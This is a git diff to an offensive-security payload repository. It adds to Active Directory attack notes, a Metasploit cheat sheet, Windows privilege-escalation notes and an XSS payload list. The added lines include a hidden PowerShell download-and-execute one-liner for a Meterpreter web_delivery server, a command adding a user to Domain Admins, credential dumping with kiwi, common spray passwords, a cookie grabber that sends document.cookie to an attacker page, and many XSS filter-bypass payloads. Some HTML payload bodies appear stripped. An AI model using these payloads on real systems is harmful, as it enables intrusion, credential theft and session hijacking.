diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index d878269..7c7e7d5 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -570,6 +570,12 @@ root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 ``` +Most of the time the best passwords to spray are : + +- Password1 +- Welcome1 +- $Companyname1 + ## Privilege Escalation @@ -658,3 +664,4 @@ net group "Domain Admins" hacker2 /add /domain * [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) +* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 013d5ac..76e6bcd 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -1,5 +1,25 @@ # Metasploit +## Summary + +* [Installation](#installation) +* [Sessions](#sessions) +* [Background handler](#background-handler) +* [Meterpreter - Basic](#meterpreter---basic) + * [Generate a meterpreter](#generate-a-meterpreter) + * [Meterpreter Webdelivery](#meterpreter-webdelivery) + * [Get System](#get-system) + * [Persistence Startup](#persistence-startup) + * [Portforward](#portforward) + * [Upload / Download](#upload---download) + * [Execute from Memory](#execute-from-memory) + * [Mimikatz](#mimikatz) + * [Pass the Hash - PSExec](#pass-the-hash---psexec) +* [Scripting Metasploit](#scripting-metasploit) +* [Multiple transports](#multiple-transports) +* [Best of - Exploits](#best-of---exploits) +* [References](#references) + ## Installation ```powershell @@ -25,7 +45,7 @@ sessions -c cmd -> Execute a command on several sessions sessions -i 10-20 -c "id" -> Execute a command on several sessions ``` -## Multi/handler in background (screen/tmux) +## Background handler ExitOnSession : the handler will not exit if the meterpreter dies. @@ -60,7 +80,25 @@ $ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > she $ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl ``` -### SYSTEM / Administrator privilege +### Meterpreter Webdelivery + +Set up a Powershell web delivery listening on port 8080. + +```powershell +use exploit/multi/script/web_delivery +set TARGET 2 +set payload windows/x64/meterpreter/reverse_http +set LHOST 10.0.0.1 +set LPORT 4444 +run +``` + +```powershell +powershell.exe -nop -w hidden -c $g=new-object net.webclient;$g.proxy=[Net.WebRequest]::GetSystemWebProxy();$g.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $g.downloadstring('http://10.0.0.1:8080/rYDPPB'); +``` + + +### Get System ```powershell meterpreter > getsystem @@ -120,6 +158,7 @@ mimikatz_command -f sekurlsa::searchPasswords ```powershell load kiwi +creds_all golden_ticket_create -d -k -s -u -t ``` diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8c751b6..cb2adbc 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -162,6 +162,12 @@ netsh firewall show state netsh firewall show config ``` +List firewall's blocked ports + +```powershell +$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports +``` + List all network shares ```powershell diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index c1034cc..92378f9 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -5,6 +5,7 @@ ```powershell net user hacker hacker /add net localgroup administrators hacker /add +net group "Domain Admins" hacker /ADD /DOMAIN ``` Some info about your user diff --git a/XSS Injection/README.md b/XSS Injection/README.md index c4f9aba..29bc724 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -2,38 +2,82 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. +## Summary + - [Exploit code or POC](#exploit-code-or-poc) + - [Data grabber for XSS](#data-grabber-for-xss) + - [UI redressing](#ui-redressing) + - [Javascript keylogger](#javascript-keylogger) + - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [Blind XSS](#blind-xss) + - [XSS Hunter](#xss-hunter) + - [Other Blind XSS tools](#other-blind-xss-tools) + - [Blind XSS endpoint](#blind-xss-endpoint) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) + - [Bypass case sensitive](#bypass-case-sensitive) + - [Bypass tag blacklist](#bypass-tag-blacklist) + - [Bypass word blacklist with code evaluation](#bypass-word-blacklist-with-code-evaluation) + - [Bypass with incomplete html tag](#bypass-with-incomplete-html-tag) + - [Bypass quotes for string](#bypass-quotes-for-string) + - [Bypass quotes in script tag](#bypass-quotes-in-script-tag) + - [Bypass quotes in mousedown event](#bypass-quotes-in-mousedown-event) + - [Bypass dot filter](#bypass-dot-filter) + - [Bypass parenthesis for string](#bypass-parenthesis-for-string) + - [Bypass onxxxx= blacklist](#bypass-onxxxx---blacklist) + - [Bypass space filter](#bypass-space-filter) + - [Bypass email filter](#bypass-email-filter) + - [Bypass document blacklist](#bypass-document-blacklist) + - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) + - [Bypass using an alternate way to redirect](#bypass-unsing-an-alternate-way-to-redirect) + - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) + - [Bypass ">" using nothing](#bypass----using-nothing) + - [Bypass ";" using another character](#bypass-using------using-another-character) + - [Bypass using HTML encoding](#bypass-using-html-encoding) + - [Bypass using Katana](#bypass-using-katana) + - [Bypass using ECMAScript6](#bypass-using-ecmascript6) + - [Bypass using Octal encoding](#bypass-using-octal-encoding) + - [Bypass using Unicode](#bypass-using-unicode) + - [Bypass using UTF-7](#bypass-using-utf---7) + - [Bypass using UTF-8](#bypass-using-utf---8) + - [Bypass using UTF-16be](#bypass-using-utf---16be) + - [Bypass using UTF-32](#bypass-using-utf---32) + - [Bypass using BOM](#bypass-using-bom) + - [Bypass using weird encoding or native interpretation](#bypass-using-weird-encoding-or-native-interpretation) - [CSP Bypass](#csp-bypass) - [Common WAF Bypass](#common-waf-bypass) ## Exploit code or POC -Cookie grabber for XSS +### Data grabber for XSS + +Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page. + +```html + + + + +``` + +Write the collected data into a file. ```php document.location='http://localhost/XSS/grabber.php?c='+document.cookie -or - - -// Write the cookie in a file $cookie = $_GET['c']; $fp = fopen('cookies.txt', 'a+'); fwrite($fp, 'Cookie:' .$cookie.'\r\n'); fclose($fp); - ?> ``` -UI redressing (Sophisticated phishing) +### UI redressing + +Leverage the XSS to modify the HTML content of the page in order to display a fake login form. ```html ``` -Keylogger for XSS +### Javascript keylogger + +Another way to collect sensitive data is to set a javascript keylogger. ```javascript ``` +### Other ways + More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all](http://www.xss-payloads.com/payloads-list.html?a#category=all): - [Taking screenshots using XSS and the HTML5 Canvas](https://www.idontplaydarts.com/2012/04/taking-screenshots-using-xss-and-the-html5-canvas/) @@ -315,7 +363,7 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu ``` -### Other tools for Blind XSS +### Other Blind XSS tools - [sleepy-puppy - Netflix](https://github.com/Netflix-Skunkworks/sleepy-puppy) - [bXSS - LewisArdern](https://github.com/LewisArdern/bXSS) @@ -406,20 +454,20 @@ javascript:`//"//\"//alert(1) ``` -Bypass tag blacklist +### Bypass tag blacklist ```javascript @@ -454,77 +504,70 @@ http://localhost/bla.php?test= ``` -Bypass quotes in mousedown event +### Bypass quotes in mousedown event + +You can bypass a single quote with ' in an on mousedown event handler ```javascript Link - -You can bypass a single quote with ' in an on mousedown event handler ``` -Bypass dot filter +### Bypass dot filter ```javascript ``` -Bypass parenthesis for string - Firefox/Opera +### Bypass parenthesis for string ```javascript alert`1` setTimeout`alert\u0028document.domain\u0029`; ``` -Bypass onxxxx= blacklist +### Bypass onxxxx= blacklist ```javascript -``` -Bypass onxxx= filter with a null byte/vertical tab - IE/Safari - -```javascript +// Bypass onxxx= filter with a null byte/vertical tab -``` -Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari - -```javascript +// Bypass onxxx= filter with a '/' ``` -Bypass space filter with "/" - IE/Firefox/Chrome/Safari +### Bypass space filter ```javascript +// Bypass space filter with "/" -``` -Bypass space filter with 0x0c/^L - -```javascript +// Bypass space filter with 0x0c/^L - $ echo "" | xxd 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c . ``` -Bypass email filter ([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) +### Bypass email filter + +([RFC compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate)) ```javascript ">"@x.y ``` -Bypass document blacklist +### Bypass document blacklist ```javascript
``` -Bypass using javascript inside a string +### Bypass using javascript inside a string ```javascript "; ``` -Bypass using an alternate way to redirect +### Bypass using an alternate way to redirect ```javascript location="http://google.com" @@ -542,7 +585,9 @@ window.location.assign("http://google.com") window['location']['href']="http://google.com" ``` -Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) +### Bypass using an alternate way to execute an alert + +From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. ```javascript window['alert'](0) @@ -561,7 +606,8 @@ content['alert'](6) [12].forEach(alert); ``` -Bypass using an alternate way to execute an alert - [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) +From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. + ```javascript prompt`${document.domain}` document.location='java\tscript:alert(1)' @@ -569,7 +615,7 @@ document.location='java\rscript:alert(1)' document.location='java\tscript:alert(1)' ``` -Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464) +From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet. ```javascript eval('ale'+'rt(0)'); @@ -616,13 +662,15 @@ XSSObject.proxy = function (obj, name, report_function_name, exec_original) { XSSObject.proxy(window, 'alert', 'window.alert', false); ``` -Bypass ">" using nothing #trololo (you don't need to close your tags) +### Bypass ">" using nothing + +You don't need to close your tags. ```javascript alert`1` ``` -Bypass using Octal encoding +### Bypass using Octal encoding ```javascript javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' ``` -Bypass using Unicode +### Bypass using Unicode ```javascript Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was @@ -704,7 +754,13 @@ Bypass using Unicode converted to uppercase <ıframe id=x onload=>.toUpperCase() become \"/\"src=\"/\"onerror=eval(id) -String.fromCharCode(88,83,83) - -